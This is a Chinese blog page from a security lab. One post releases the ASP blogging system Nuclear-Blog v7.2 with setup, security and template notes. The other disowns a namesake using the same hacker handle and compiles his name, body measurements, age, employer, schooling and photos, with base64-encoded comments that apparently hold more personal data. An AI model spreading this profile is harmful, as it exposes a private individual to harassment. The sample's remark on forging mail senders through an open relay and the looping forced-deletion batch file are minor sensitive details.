普通视图

昨天以前Nuclear'Atk（核攻击）网络安全实验室

Nuclear-Blog v7.2 博客系统最终版开源下载

2020年5月30日 22:28

p align="center"img alt="首页" src="https://lcx.cc/file/4599/首页.png" //p h2 id="前言"前言/h2 p　　大概在 2010 年前后，那会儿非常流行搭博客，stronga href="https://lcx.cc/"核总/astrong本人也想搭一个，但是找来找去，找不到一个/strong安全、简洁、高效/strong的博客程序，于是乎狠心下来自己strong从零开发/strong一个，于是这套博客系统诞生了，后来命名为 a href="https://lcx.cc/%E5%85%B3%E4%BA%8E/#%E4%BB%A3%E7%A0%81%E5%BC%80%E6%BA%90"Nuclear-Blog/a。/p p　　说起来从零开发博客，并且strong全部代码接近于完全原创/strong，国内做到的人估计strong屈指可数/strong，一是需要strong大量时间和经验/strong，二是需要strong极高的编程功力/strong，只是这两点就足以strong令 99% 的人望而却步/strong，所以strong大多数人只是拿个开源的博客二次开发一下、换个皮、改个模板玩玩/strong。/p p　　从 2010 年到 2015 年，这套博客程序经历了strong无数次迭代更新/strong，再加上a href="https://lcx.cc"核总/a从骨子里追求strong精益求精、登峰造极/strong，所以这 5 年时间里已经将该系统打磨的strong极其安全、稳定、简洁、高效/strong了，同时也极大地strong提升了个人编程水平/strong，并且strong顺带学到了很多底层协议、知识/strong，对以后的strong个人综合技术水平提升/strong起到了很大的帮助。/p p　　那么，有细心的读者发现了，strong为何 2015 年后没有更新了呢？/strong/p p　　原因很简单，该有的功能都有了，不该有的功能也加了，一个博客系统已strong无限接近于成熟和完美/strong，所以后边更新的频率越来越低，因为strong没啥可更新的了/strong，哈哈哈……/p p　　历史上也a href="https://lcx.cc/%E5%85%B3%E4%BA%8E/#%E4%BB%A3%E7%A0%81%E5%BC%80%E6%BA%90"开源过几次/a，版本列表如下：/p ul lia href="https://lcx.cc/post/1184/"Nuclear-Blog v4.0/a/li lia href="https://lcx.cc/post/1235/"Nuclear-Blog v5.0/a/li lia href="https://lcx.cc/post/1531/"Nuclear-Blog v5.0/a/li lia href="https://lcx.cc/post/2034/"Nuclear-Blog v6.0/a/li /ul p　　后来到了 2018 年，由于 Asp strong无法跨平台/strong，试了很多方案无解，同时 PHP 已充斥了整个行业，Asp 生存空间越来越小（过时但永不淘汰），再加上个人strong精力有限/strong，最终strong放弃了继续开发/strong。/p p　　遂于 2018 年中旬抽时间整理了之前的内容，并彻底更换网站系统为 a href="https://caddyserver.com/"Caddy/a + a href="https://gohugo.io/"Hugo/a 跨平台完美组合，于 2018 年 9 月中旬a href="https://lcx.cc/%E5%85%B3%E4%BA%8E/#%E4%B8%AD%E9%80%94%E5%85%B3%E7%AB%99"重新上线/a。/p p　　随着时代的变迁，从最开始的strong博客/strong，接下来strong轻博客/strong，到现在的strong微博/strong，大家越来越strong不喜欢臃肿的长文章/strong，更喜欢strong短小精悍的碎片信息/strong，这年头还坚持写博客的人，已经寥寥无几了。/p p　　再后来，有很多朋友喜欢这套博客程序，原因是strong很简洁而且相当安全/strong，于是在众多朋友strong频繁催更/strong之下，抽时间整理了strong最终版/strong的源码，现发布出来。/p p　　目前版本是 a href="https://lcx.cc/post/4599/"Nuclear-Blog v7.2/a，也是strong最终版本/strong，以下是使用说明和相关功能介绍。/p h2 id="快速使用"快速使用/h2 p　　1、下载 a href="https://lcx.cc/post/4599/"Nuclear-Blog v7.2/a 压缩包并解压。/p p　　2、在文件 strong\admin\Index.asp/strong 中strong修改后台登陆账号和密码/strong，默认 admin:123456。/p p　　3、将后台管理主目录 strong/admin//strong 修改为strong其他人猜不到的名字/strong。/p p　　4、在 strong/inc/conn.asp/strong 中strong将数据库名字修改为其他人猜不到/strong的，strong别忘了将两个对应的 .mdb 文件也改名/strong。/p p　　5、上传所有文件到你的 Windows 服务器或者支持 Asp 的虚拟主机、空间，如有必要，请参考“strong初始化设置/strong”对服务器进行相关调整。/p p　　6、访问后台，strong修改一下网站名称之类的基本参数/strong，添加一点内容，Enjoin！/p p　　操作过程中strong如果有疑问或者报错，请参考底下的手册/strong。/p p　　本系统strong已经十分安全/strong，strong强迫症患者/strong可以参考底下设置一下相关权限。/p h2 id="文件结构"文件结构/h2 p　　本博客系统的文件strong结构简洁/strong、strong逻辑清晰/strong，每个文件中都有详细的strong代码说明和注释/strong，以供二次开发或者修改代码所参考，具体结构如下：/p table thead tr th路径/th th说明/th /tr /thead tbody tr td　/td td　/td /tr tr td\后台密码加密算法\/td td加密算法，用于生成 strong\admin\Index.asp/strong 中后台登陆strong账号和密码的密文/strong，独立运行，strong可以删除/strong。/td /tr tr td　/td td　/td /tr tr td\favicon.ico/td td浏览器地址栏的小图标，也用于收藏夹，非必须的，看个人喜好更换或删除。/td /tr tr td\404.asp/td td自定义的 404 错误页面。/td /tr tr td\file.asp/td td所有的附件、图片、文件处理程序，主要功能是strong提取数据库中的文件，缓存并输出/strong。/td /tr tr td\index.asp/td tdstrong核心文件/strong，所有的首页、文章、列表、内容处理程序。/td /tr tr td　/td td　/td /tr tr td\admin\/td td后台相关文件，strong该目录名可以随意改名，最好修改成别人猜不到的/strong。/td /tr tr td\admin\Index.asp/td tdstrong后台登陆账号和密码在这里改，配合上边的算法使用，默认账号和密码 admin:123456。/strong/td /tr tr td　/td td　/td /tr tr td\cache\/td tdstrong所有页面、文件、图片的缓存/strong，访问会strong自动生成/strong，可以随时手动删除或在后台清空，程序会在你修改数据的时候自动更新缓存，核心代码strong全自动的/strong，基本不用管。/td /tr tr td　/td td　/td /tr tr td\image\/td td所有的模板文件、图片、CSS、JS 等静态资源存放路径。/td /tr tr td\image\Content.html/td td内容页面模板。/td /tr tr td\image\Index.html/td td首页模板。/td /tr tr td\image\List.html/td td列表模板。/td /tr tr td\image\LiuYan.html/td td留言板模板。/td /tr tr td\image\face\/td td留言板的默认头像。/td /tr tr td\image\KindEditor\/td tdKindEditor 编辑器，用的纯静态版，strong不用担心任何漏洞/strong。/td /tr tr td　/td td　/td /tr tr td\inc\0b1214c54b5a59d3_data.mdb/td td存放文章、浏览、系统设置的数据库，strong建议名字改成别人猜不到的，以防非法下载，造成数据泄露/strong。/td /tr tr td\inc\0b1214c54b5a59d3_file.mdb/td td存放附件、图片等文件二进制数据的数据库，strong建议名字改成别人猜不到的，以防非法下载，造成数据泄露/strong。/td /tr tr td　/td td　/td /tr tr td\inc\MD5.asp/td tdMD5 算法。/td /tr tr td\inc\Conn.asp/td td数据库链接配置和一些公共函数，如果strong修改了数据库名字，记得在这里也改一下/strong。/td /tr tr td\inc\Anti-CC_CDN.asp/td td早年写的一个strong高效防 CC 攻击模块/strong（支持 CDN，也可以防strong路径扫描、恶意采集和暴力破解/strong），具体参考a href="https://lcx.cc/post/2094/"Asp 防御CC攻击模块 (Anti-CC.asp)/a/td /tr tr td　/td td　/td /tr tr td\liuyan\index.asp/td td留言板。/td /tr tr td\liuyan\liuyan.asp/td td留言板，提交留言。/td /tr tr td　/td td　/td /tr tr td\music\/td td一个在线音乐视频播放器，主要用于strong在文章中插入多媒体文件/strong。/td /tr /tbody /table h2 id="安全设置"安全设置/h2 p　　如果你在 strong\admin\Index.asp/strong 中添加：/p p　　codelt;!--#include file=quot;Inc/Anti-CC_CDN.aspquot;--gt;/code/p p　　还能天然strong免疫暴力破解登陆密码攻击/strong，退一万步讲，即使strong有后台权限也拿不到 webshell/strong，最多删删文章、改改首页意淫下罢了（所以建议strong多备份/strong）。/p p　　XSS 之类的就更不用担心了，strong不存在任何 XSS 漏洞（欢迎各种代码审计）/strong。/p p　　如你用的 CDN 的话，所有访客 IP 地址是通过 strongHTTP_X_FORWARDED_FOR/strong 获取的，但是不用担心，strong该函数已进行安全处理/strong。/p p　　为了安全起见，建议设置一下strong文件访问权限/strong，其实不设置也不要紧，strong这套系统从正面无人能入侵（再次欢迎各种代码审计）/strong，建议的文件访问权限设置如下：/p table thead tr th路径/th th权限/th /tr /thead tbody tr td　/td td　/td /tr tr td\cache\ 及子目录/td td可读可写，strong禁止执行/strong/td /tr tr td　/td td　/td /tr tr td\inc\/td td可读可写（strong主要是为了能修改 mdb 数据库/strong）/td /tr tr td\inc\*.asp/td td只读，strong不可写/strong/td /tr tr td　/td td　/td /tr tr td其余所有目录、文件及子目录/td td只读，strong不可写/strong/td /tr /tbody /table h2 id="数据备份"数据备份/h2 p　　a href="https://lcx.cc/post/4599/"Nuclear-Blog v7.2/a 博客系统备份十分简单方便，只需要strong打包一下除 \cache\ 目录之外的所有文件/strong即可。/p p　　建议首次打包备份后，以后strong只需要单独打包一下 \inc\ 目录下的两个 mdb 数据库/strong即可，以减少传输数据量。/p p　　众所周知，strong三处离线灾备/strong是基本原则。/p h2 id="依赖组件"依赖组件/h2 p　　网站留言版是可以设置strong有新留言自动发送邮件提醒/strong的，具体设置见后台，该功能需要依赖 JMail 发送邮件组件，下载地址见底下。/p p　　也有无组件发送邮件的方法，你可以自己改改，但效果不太好，strong因为是公共地址发送，各种被滥用，容易进垃圾箱(100%)/strong，相关代码如下：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt" 1 /spanspan class="lnt" 2 /spanspan class="lnt" 3 /spanspan class="lnt" 4 /spanspan class="lnt" 5 /spanspan class="lnt" 6 /spanspan class="lnt" 7 /spanspan class="lnt" 8 /spanspan class="lnt" 9 /spanspan class="lnt"10 /spanspan class="lnt"11 /spanspan class="lnt"12 /spanspan class="lnt"13 /spanspan class="lnt"14 /spanspan class="lnt"15 /spanspan class="lnt"16 /spanspan class="lnt"17 /spanspan class="lnt"18 /spanspan class="lnt"19 /spanspan class="lnt"20 /spanspan class="lnt"21 /spanspan class="lnt"22 /spanspan class="lnt"23 /spanspan class="lnt"24 /spanspan class="lnt"25 /spanspan class="lnt"26 /spanspan class="lnt"27 /spanspan class="lnt"28 /spanspan class="lnt"29 /spanspan class="lnt"30 /spanspan class="lnt"31 /spanspan class="lnt"32 /spanspan class="lnt"33 /spanspan class="lnt"34 /spanspan class="lnt"35 /spanspan class="lnt"36 /spanspan class="lnt"37 /spanspan class="lnt"38 /spanspan class="lnt"39 /spanspan class="lnt"40 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"lt;% #39; CDOSYS 发邮件、Win7 无组件发送、支持 Godaddy 的发邮件代码、非 Jmail（使用 godaddy 公共 SMTP 服务器 relay-hosting.secureserver.net 不需要用户密码验证，需要系统：Windows/IIS） #39; 注意：Godaddy 的空间/虚拟主机禁止了所有三方 SMTP 服务器，只能用他自己服务器。注意需要使用 utf-8 编码，否则乱码！ #39; http://blog.csdn.net/tangolivesky/article/details/6266985 #39; https://sg.godaddy.com/zh/help/using-cdosys-to-send-email-from-your-windows-hosting-account-1073 #39; 1、发现很有意思的地方，就是发件人可以随意填写，都能发送成功，根本不需要什么godaddy的企业邮局，这一点让我很惊讶。 #39; 2、objMail.BodyPart.Charset=#34;utf-8#34; 增加了编码定义功能，发送邮件不再乱码 #39; 3、邮件到达的速度时快时慢，有时候可以达到秒速，有时候可能要好几分钟 #39; 4、进垃圾邮箱几率很大，需要加白名单 #39; 创建组件 dim CDOMail, STUl set CDOMail = CreateObject(#34;CDO.Message#34;) #39; 设置邮件参数 CDOMail.From = #34;from@163.com#34; #39;发信人 CDOMail.To = #34;to@163.com#34; #39;收信人 CDOMail.Subject = #34;标题#34; #39;标题 CDOMail.BodyPart.Charset = #34;utf-8#34; #39;编码 CDOMail.HTMLBody = #34;内lt;brgt;容#34; #39;Html 内容 #39; CDOMail.TextBody = #34;邮件内容#34; #39;文本内容 #39; CDOMail.AddAttachment #34;D:\www\images\right.png#34; #39;附件 #39; 配置 SMTP 服务器 STUl = #34;http://schemas.microsoft.com/cdo/configuration/#34; With CDOMail.Configuration.Fields .Item(STUl amp; #34;sendusing#34;) = 2 #39;发送使用端口 .Item(STUl amp; #34;smtpserverport#34;) = 25 #39;SMTP服务器端口 .Item(STUl amp; #34;smtpconnectiontimeout#34;) = 60 #39;连接超时（秒） .Item(STUl amp; #34;smtpserver#34;) = #34;relay-hosting.secureserver.net#34; #39;Godaddy 公共 SMTP 服务器（不需要用户密码验证） #39; .Item(STUl amp; #34;smtpserver#34;) = #34;smtp.163.com#34; #39;SMTP服务器地址 #39; .Item(STUl amp; #34;smtpauthenticate#34;) = 1 #39;远程服务器需要验证 #39; .Item(STUl amp; #34;sendusername#34;) = #34;from@163.com#34; #39;发送方邮箱地址 #39; .Item(STUl amp; #34;sendpassword#34;) = #34;password#34; #39;发送方邮箱密码 .Update End With #39;执行发送 CDOMail.Send %gt; /code/pre/td/tr/table /div /divh2 id="初始化设置"初始化设置/h2 h3 id="1启用父路径"1、启用父路径/h3 p　　IIS -gt; 网站 -gt; 网站名 -gt; Asp -gt; 启用父路径 -gt; True/p p　　否则会报错：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /spanspan class="lnt"2 /spanspan class="lnt"3 /spanspan class="lnt"4 /spanspan class="lnt"5 /spanspan class="lnt"6 /spanspan class="lnt"7 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"Active Server Pages 错误 #39;ASP 0131#39; 不允许的父路径 /liuyan/index.asp，行 1 包含文件“../Inc/Conn.asp”不能用“..”表示父目录。 /code/pre/td/tr/table /div /divp　　或者你strong把所有包含文件改成绝对路径/strong，就不用修改该设置了，但是如果strong运行在子目录兼容性会变差/strong。/p h3 id="2兼容--iis-70"2、兼容 ≥ IIS 7.0/h3 p　　IIS 7.0 及更高版本使用 32 位 mdb 数据库必须进行如下操作：/p p　　IIS -gt; 应用程序池 -gt; 网站名 -gt; 右键高级设置 -gt; 启用 32 位应用程序 -gt; True/p p　　否则会报错：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /spanspan class="lnt"2 /spanspan class="lnt"3 /spanspan class="lnt"4 /spanspan class="lnt"5 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"ADODB.Connection 错误 #39;800a0e7a#39; 未找到提供程序。该程序可能未正确安装。 /Inc/Conn.asp，行 33 /code/pre/td/tr/table /div /divh3 id="3临时调试程序"3、临时调试程序/h3 p　　strong【警告：如非调试请勿进行此操作】/strong/p p　　如需临时调试程序代码，请执行以下操作：/p p　　IIS -gt; 网站 -gt; 网站名 -gt; Asp -gt; 编译/调试 -gt; 将错误发送到浏览器 -gt; True/p p　　并注释掉相关文件的 strongOn Error Resume Next/strong，共有以下文件：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt" 1 /spanspan class="lnt" 2 /spanspan class="lnt" 3 /spanspan class="lnt" 4 /spanspan class="lnt" 5 /spanspan class="lnt" 6 /spanspan class="lnt" 7 /spanspan class="lnt" 8 /spanspan class="lnt" 9 /spanspan class="lnt"10 /spanspan class="lnt"11 /spanspan class="lnt"12 /spanspan class="lnt"13 /spanspan class="lnt"14 /spanspan class="lnt"15 /spanspan class="lnt"16 /spanspan class="lnt"17 /spanspan class="lnt"18 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"file.asp 4:On Error Resume Next index_bak.asp 29:On Error Resume Next admin\File_UpLoad_Class.asp 430: On Error Resume Next 470: On Error Resume Next liuyan\liuyan.asp 4:On Error Resume Next liuyan\index.asp 4:On Error Resume Next index.asp 29:On Error Resume Next /code/pre/td/tr/table /div /divh3 id="4一些其他设置"4、一些其他设置/h3 p　　/inc/conn.asp/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt" 1 /spanspan class="lnt" 2 /spanspan class="lnt" 3 /spanspan class="lnt" 4 /spanspan class="lnt" 5 /spanspan class="lnt" 6 /spanspan class="lnt" 7 /spanspan class="lnt" 8 /spanspan class="lnt" 9 /spanspan class="lnt"10 /spanspan class="lnt"11 /spanspan class="lnt"12 /spanspan class="lnt"13 /spanspan class="lnt"14 /spanspan class="lnt"15 /spanspan class="lnt"16 /spanspan class="lnt"17 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"lt;% #39;... #39;是否以CDN模式运行（获取访客真实IP地址） IsCDN = False #39;缓存文件存放目录，切记最后要加：\ CachePath = Server.MapPath(#34;/cache/#34;) amp; #34;\#34; #39;主数据库路径（存放：文章、留言、配置） DataPath = Server.MapPath(#34;/inc/0b1214c54b5a59d3_data.mdb#34;) #39;文件数据库路径（存放：文件） DataPath_File = Server.MapPath(#34;/inc/0b1214c54b5a59d3_file.mdb#34;) #39;... %gt; /code/pre/td/tr/table /div /divh2 id="网站模板"网站模板/h2 p　　模板很简单，由于全站页面并不多，所以只有几个 .html 文件，所有模板相关的文件都储存在 \image\，具体参考上边的文件结构，采用 stronghtml + 标签替换/strong的方式生成实际页面内容，具体可以参考 index.asp 和 /inc/conn.asp 中的代码。/p p　　模板支持的标签和变量/p table thead tr th style="text-align:center"有效范围/th th变量标签/th th功能描述/th /tr /thead tbody tr td style="text-align:center"　/td td　/td td　/td /tr tr td style="text-align:center"全局变量/td td{网站名称}、{网站域名}/td td网站名称、网站域名。/td /tr tr td style="text-align:center"全局变量/td td{主页描述}、{主页关键字}/td td主页的描述、关键词，给搜索引擎蜘蛛看的，SEO 优化用的。/td /tr tr td style="text-align:center"全局变量/td td{推荐内容}、{友情链接}/td td自定义的推荐内容、友情链接代码。/td /tr tr td style="text-align:center"全局变量/td td{统计代码}/td td统计用的JS代码。/td /tr tr td style="text-align:center"全局变量/td td{顶部广告}、{底部广告}/td td两个独立的广告代码。/td /tr tr td style="text-align:center"全局变量/td td{当前页码}/td td当前文章或列表的页码，首页为 0。/td /tr tr td style="text-align:center"全局变量/td td{随机数}/td td产生一个随机数，一般用来做防采集，随机乱码用的。/td /tr tr td style="text-align:center"　/td td　/td td　/td /tr tr td style="text-align:center"主页变量/td td{最新内容}/td td按ID从大到小排序（倒叙）的文章列表。/td /tr tr td style="text-align:center"主页变量/td td{最多浏览}/td td按点击数从大到小排序（倒叙）的文章列表。/td /tr tr td style="text-align:center"主页变量/td td{随便看看}/td td随机提取的文章列表。/td /tr tr td style="text-align:center"　/td td　/td td　/td /tr tr td style="text-align:center"列表变量/td td{文章列表}、{页码列表}/td td按照ID或点击数从大到小排列的文章列表及页码。/td /tr tr td style="text-align:center"　/td td　/td td　/td /tr tr td style="text-align:center"文章变量/td td{标题}、{作者}、{内容}/td td文章的标题、作者及内容。/td /tr tr td style="text-align:center"文章变量/td td{时间}、{修改}、{点击数}/td td文章的发表、最后修改时间，以及点击数。/td /tr tr td style="text-align:center"文章变量/td td{关键字}、{描述}/td td文章的关键词、描述，给搜索引擎蜘蛛看的，SEO 优化用的。/td /tr tr td style="text-align:center"文章变量/td td{默认作者}/td td文章的默认作者，会替换为系统设置里指定的值。/td /tr tr td style="text-align:center"文章变量/td td{简单描述}/td td截取适当长度的文章描述，在文章页面顶部做简单显示。/td /tr tr td style="text-align:center"文章变量/td td{上一篇链接}、{上一篇标题}/td td上一篇文章的ID（编号）、标题。/td /tr tr td style="text-align:center"文章变量/td td{下一篇链接}、{下一篇标题}/td td下一篇文章的ID（编号）、标题。/td /tr tr td style="text-align:center"文章变量/td td{本页链接}/td td当前文章页面的完整 Url 地址，用于在转载信息里调用。/td /tr tr td style="text-align:center"文章变量/td td{评论数}/td td当前文章对应的评论条数。/td /tr /tbody /table p　　提示：测试模板的时候记得strong禁用缓存或者隔一秒自动删除缓存文件/strong，以便查看最新修改后的效果，这是一个strong自动循环删除缓存的批处理/strong例子：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /spanspan class="lnt"2 /spanspan class="lnt"3 /spanspan class="lnt"4 /spanspan class="lnt"5 /spanspan class="lnt"6 /spanspan class="lnt"7 /spanspan class="lnt"8 /spanspan class="lnt"9 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-bat" data-lang="bat"span class="k"echo/span off span class="p"amp;/span span class="k"cls/span span class="k"echo/span 为防止意外执行造成数据丢失，请按任意键以继续…… span class="k"echo/span. span class="k"pause/span span class="p":/spanspan class="nl"1/span span class="k"del/span /s /f /q /a span class="s2"#34;/spanspan class="nv"%cd%/spanspan class="s2"\cache\*.*#34;/span ping 127.0.0.1 -w 1 -n 3 span class="k"goto/span span class="nl"1/span /code/pre/td/tr/table /div /divp　　以上代码保存到：strong\网站跟目录\清理缓存.bat/strong/p p　　strong提示：默认的模板经过长期微调，对各大搜索引擎的 SEO 十分友好，可以参考。/strong/p h2 id="下载地址"下载地址/h2 p　　a href="https://lcx.cc/file/4599/Nuclear-Blog%20v7.2.rar"Nuclear-Blog v7.2/a，需要 WinRAR 5.0 或更高版本解压。/p p　　a href="https://lcx.cc/file/4599/JMail%20%E5%8F%91%E9%80%81%E9%82%AE%E4%BB%B6%E7%BB%84%E4%BB%B6.rar"w3 JMail v4.5 免费版.msi/a，JMail 发送邮件组件，新留言自动发邮件提醒用的。/p h2 id="相关截图"相关截图/h2 p align="center"img alt="首页" src="https://lcx.cc/file/4599/首页.png" //p p align="center"img alt="首页底部" src="https://lcx.cc/file/4599/首页底部.png" //p p align="center"img alt="文章列表" src="https://lcx.cc/file/4599/文章列表.png" //p p align="center"img alt="文章内容" src="https://lcx.cc/file/4599/文章内容.png" //p p align="center"img alt="文章留言" src="https://lcx.cc/file/4599/文章留言.png" //p p align="center"img alt="后台登录界面" src="https://lcx.cc/file/4599/后台登录界面.png" //p p align="center"img alt="后台数据统计" src="https://lcx.cc/file/4599/后台数据统计.png" //p p align="center"img alt="后台网站设置" src="https://lcx.cc/file/4599/后台网站设置.png" //p p align="center"img alt="后台变量标签" src="https://lcx.cc/file/4599/后台变量标签.png" //p p align="center"img alt="后台媒体播放" src="https://lcx.cc/file/4599/后台媒体播放.png" //p p align="center"img alt="后台文件列表" src="https://lcx.cc/file/4599/后台文件列表.png" //p p align="center"img alt="后台文章列表" src="https://lcx.cc/file/4599/后台文章列表.png" //p p align="center"img alt="后台文章添加及编辑" src="https://lcx.cc/file/4599/后台文章添加及编辑.png" //p p align="center"img alt="后台留言列表" src="https://lcx.cc/file/4599/后台留言列表.png" //p p align="center"img alt="后台留言编辑" src="https://lcx.cc/file/4599/后台留言编辑.png" //p p align="center"img alt="后台文件上传_缩略图模式" src="https://lcx.cc/file/4599/后台文件上传_缩略图模式.png" //p p align="center"img alt="后台文件上传_列表模式_上传中" src="https://lcx.cc/file/4599/后台文件上传_列表模式_上传中.png" //p

★ 公告 ★ 关于西安另一个“核攻击” ★ 郭瑞 ★

Nuclear'Atk（核攻击）网络安全实验室

2019年11月26日 15:44

p　　首先概述一下strong关键信息/strong，我网名叫a href="https://lcx.cc/"strong核攻击/strong/a，人送外号“a href="https://lcx.cc/"strong核总/strong/a”，从事网络安全行业已有strong十多年/strong，常年混迹于国内外各大安全圈，在 strongT00ls/strong、strong乌云/strong等各大知名网站、平台的账号（ID）均为“a href="https://lcx.cc/"strong核攻击/strong/a”（部分不能使用中文字符的网站 ID 为 a href="https://lcx.cc/"strongNuclearrsquo;Atk/strong/a），经过十多年的摸爬滚打，积累了雄厚的技术知识，略得行内朋友追捧，在国内安全行业strong略有小名/strong，唯一的官网网址为 a href="https://lcx.cc/"lcx.cc/a，具体请看我的a href="https://lcx.cc/%E5%85%B3%E4%BA%8E/"strong个人介绍/strong/a。/p p　　大概从两三年前开始，陆续有朋友问我，西安某域网络公司（早期为：西安某象网络公司）有个叫a href="https://lcx.cc/"strong核攻击/strong/a的技术人员strong是否我本人/strong，我均回答：“strong不知道，不是我本人。/strong”/p p　　从业十余年，历史上有意或无意使用strong相同或高度相似网名、称号、ID、账号/strong的人非常多（参考a href="https://lcx.cc/%E5%85%B3%E4%BA%8E/#%E6%B3%A8%E6%84%8F%E9%AA%97%E5%AD%90"历史文章/a），毕竟这只是个网名，谁都可以用，而且中国这么大、人口这么多，重名重姓并不稀奇，并且精力有限也顾不过来，没必要去计较太多……/p p　　但是最近一段时间，陆续有朋友向我打听投资某区块链项目如何，说是该项目的技术负责人就是西安某域网络公司的这个“a href="https://lcx.cc/"strong核攻击/strong/a”，于是便以为是我本人，我一脸懵逼回答：“strong不清楚，我没听说也没搞过这项目，不是我本人。/strong”/p p　　就在前几天，我抽空仔细想了一下，由于现在市面上区块链等类似投资项目比较敏感，strong无论上述项目是否安全属实/strong，我都认为strong这个事情很有必要避嫌/strong，避免以后产生关联……/p p　　所以a href="https://lcx.cc/"我/a（a href="https://lcx.cc/"核攻击/aa href="https://lcx.cc/"(https://lcx.cc/)/a）抽空通过百度搜索引擎简单查询了下这个人，发现他自 2015 年起（或更早）就在a href="https://www.trjcn.com/topic/index/15898.html"网络上/a及日常工作生活中strong对外吹嘘/strong自己是strong中国知名黑客/strong、乌云 ID a href="https://lcx.cc/"strong核攻击/strong/a等等，近几年业务主要以strong区块链/strong类项目为主。/p p　　相关结果如下所示，文中所有资料均来自a href="http://www.gsxt.gov.cn/"strong国家企业信用信息公示系统/strong/a或strong第三方权威且公开的机构或公司/strong或strongQQ、微信个人资料/strong查询所得，strong不涉及任何人的隐私信息/strong。/p p　　strong总之一句话，核攻击只是个网名，我可以叫核攻击，你也可以叫“核攻击”，其他任何人也都可以叫“核攻击”，但是其他叫核攻击的人正在做的项目或者未来即将做的任何事情，都和我没有任何关系。/strong/p h2 id="个人资料"个人资料/h2 !-- ![郭瑞1.png](/file/4598/郭瑞1.png) -- p　　姓名：郭瑞/p p　　性别：男/p p　　身高：183cm/p p　　体重：200+ (估计)/p p　　年龄：32 (1987)/p p　　星座：水瓶座 (1.20 - 2.18)/p p　　公司：西安某域网络公司/p p　　职业：企业法人、技术研发/p p　　先后毕业于西安音乐学院打击乐专业、西安工业大学电子工程专业。/p h2 id="相关照片"相关照片/h2 !-- IVvpg63nkZ4yLnBuZ10oL2ZpbGUvNDU5OC/pg63nkZ4yLnBuZyk= -- pimg src="https://lcx.cc/file/4598/%E9%83%AD%E7%91%9E_2016%E5%B9%B4%E7%AC%AC%E4%B8%89%E5%B1%8A%E8%89%BA%E6%9C%AF%E4%BA%92%E8%81%94%E7%BD%91%E5%A4%A7%E4%BC%9A_%E6%BC%94%E8%AE%B2_%E3%80%8A%E4%B8%8B%E4%B8%80%E4%B8%AA%E8%89%BA%E6%9C%AF%E7%BB%8F%E7%BA%AA%E4%BA%BA%E6%98%AFMM%E3%80%8B_3.png" alt="郭瑞_2016年第三届艺术互联网大会_演讲_《下一个艺术经纪人是MM》_3.png"/p pimg src="https://lcx.cc/file/4598/%E9%83%AD%E7%91%9E_2016%E5%B9%B4%E7%AC%AC%E4%B8%89%E5%B1%8A%E8%89%BA%E6%9C%AF%E4%BA%92%E8%81%94%E7%BD%91%E5%A4%A7%E4%BC%9A_%E6%BC%94%E8%AE%B2_%E3%80%8A%E4%B8%8B%E4%B8%80%E4%B8%AA%E8%89%BA%E6%9C%AF%E7%BB%8F%E7%BA%AA%E4%BA%BA%E6%98%AFMM%E3%80%8B_1.png" alt="郭瑞_2016年第三届艺术互联网大会_演讲_《下一个艺术经纪人是MM》_1.png"/p pimg src="https://lcx.cc/file/4598/%E9%83%AD%E7%91%9E_2016%E5%B9%B4%E7%AC%AC%E4%B8%89%E5%B1%8A%E8%89%BA%E6%9C%AF%E4%BA%92%E8%81%94%E7%BD%91%E5%A4%A7%E4%BC%9A_%E6%BC%94%E8%AE%B2_%E3%80%8A%E4%B8%8B%E4%B8%80%E4%B8%AA%E8%89%BA%E6%9C%AF%E7%BB%8F%E7%BA%AA%E4%BA%BA%E6%98%AFMM%E3%80%8B_2.jpg" alt="郭瑞_2016年第三届艺术互联网大会_演讲_《下一个艺术经纪人是MM》_2.jpg"/p !-- 44CA44CAPGJyIC8+CuOAgOOAgOaJi+acuu+8mjEzMVwqXCpcKjk5OTkxKOengeS6uiksIDE1M1wqXCpcKlwqNTIxOSjlr7nlhawpLCAxMzZcKlwqXCpcKjE0NzUo6LSi56iOKTxiciAvPgrjgIDjgIDlvq7ljZrvvJpodHRwczovL3d3dy53ZWliby5jb20vdS82MVwqXCpcKlwqXCpcKjY5PGJyIC8+CuOAgOOAgOmCrueuse+8mmd1b3J1aVwqXCpcKkB2aXAucXEuY29tPGJyIC8+CuOAgOOAgFFR5Y+377yaMTdcKlwqXCpcKlwqNTM8YnIgLz4K44CA44CA6Lqr5Lu96K+B77yaNjEwNTAyMTk4N1wqXCpcKlwqXCpcKlwqWCAo6ZmV6KW/5rit5Y2X5biC5Li05rit5Yy6KQ== 44CA44CA5pu+5LqOMjAxNuW5tDA35pyIMjjml6Xlj5fpgoDlj4LliqDkuobjgIoyMDE25bm056ys5LiJ5bGK6Im65pyv5LqS6IGU572R5aSn5Lya44CL77yM5bm25L2c5LqG5ryU6K6y77yM6aKY55uu5piv44CK5LiL5LiA5Liq6Im65pyv57uP57qq5Lq65pivTU3jgIvjgIIKCuOAgOOAgOilv+WuieafkOixoee9kee7nOWFrOWPuOiRo+S6i+mDreeRnuWFiOeUn+iHtOi+nuinhumikTxiciAvPgrjgIDjgIB+fmh0dHBzOi8vdmlkZW8udHVkb3UuY29tL3YvWE1UWTVPRFV5TmpBM05nPT0uaHRtbH5+ICjlt7LkuKLlpLEpPGJyIC8+CuOAgOOAgH5+aHR0cHM6Ly92LnlvdWt1LmNvbS92X3Nob3cvaWRfWE1UWTVPRFV5TmpBM05nPT0uaHRtbH5+ICjlt7LkuKLlpLEp 